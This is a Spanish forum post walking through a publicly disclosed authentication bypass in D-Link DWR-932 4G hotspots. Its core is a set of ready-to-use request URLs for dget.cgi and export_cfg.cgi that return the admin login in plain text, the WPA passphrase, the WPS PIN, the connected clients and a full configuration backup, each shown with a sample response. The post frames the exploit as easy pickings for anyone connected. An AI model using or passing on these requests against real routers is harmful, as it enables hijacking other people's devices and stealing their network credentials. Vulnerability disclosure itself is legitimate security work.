Foro Wifi-libre.com

Cómo entrar en un D-Link DWR-932 sin conocer la contraseña

Full disclosure original :

• D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure de Saeed reza ZAMANIAN @ PacketStorm

  El DWR-932 4G LTE (Mobile Wi Fi Hotspot 150 Mbps) es un router "de bolsillo" que se conecta a la red 4G para crear un hotspot wifi. 
Tiene "hasta 4 horas" de autonomía con su batería y un botón WPS PBC
Más detalles sobre el producto en : 4G LTE Mobile Wi Fi Hotspot 150 Mbps DWR-932 : Especificaciones

  Por lo menos los de de D-link son honestos : Si la gente en la foto tiene que estar codo a codo es probablemente porque están obligados a estar así por el alcance del chisme.
  Y si podemos contar diez personas conectadas en la foto es probablemente porque es el máximo posible.
  Solo falta poner "comparte tus credenciales" y sería el primer caso de publicidad honesta en la historia de la humanidad.

  Una vez conectado es muuuuuuuuuuy fácil saltarse los credenciales que protegen la interfaz de configuración.
El script /cgi-bin/dget.cgi se encarga en gran parte de ejecutar las peticiones de los clientes conectados.
El problema es que no verifica los credenciales si le mandamos directamente nuestras peticiones
  Un cliente puede conocer los credenciales sin estar autenticado navegando directamente a esta url:

http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807

  Además están guardados en texto plano ... ¡Solo hay que servirse!
  El cliente obtiene algo así:

{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }

  Puede así usar los credenciales obtenidos así para entrar en la interfaz de configuración como administrador y hacerse con el control del router 4G-WiFi

  Otra forma de usar la brecha, ya que estamos en un foro wifi, vais a ver, les va a gustar...
Podemos "saber lo todo" sobre el wifi con esta URL:

http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703

Y obtendremos una respuesta así:

{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }

Contraseña WPA, PIN WPS, clientes conectados con su IP, configuración del filtrado mac con la lista de las mac

Para obtener rápido todos los parámetros y poder examinar todo a la lupa con la calma, es facíl, hacemos un "backup" y nos lo llevamos para casa : 

http://192.168.0.1/cgi-bin/export_cfg.cgi

 
  Compartir su wifi es una cosa... compartir sus credenciales es otra.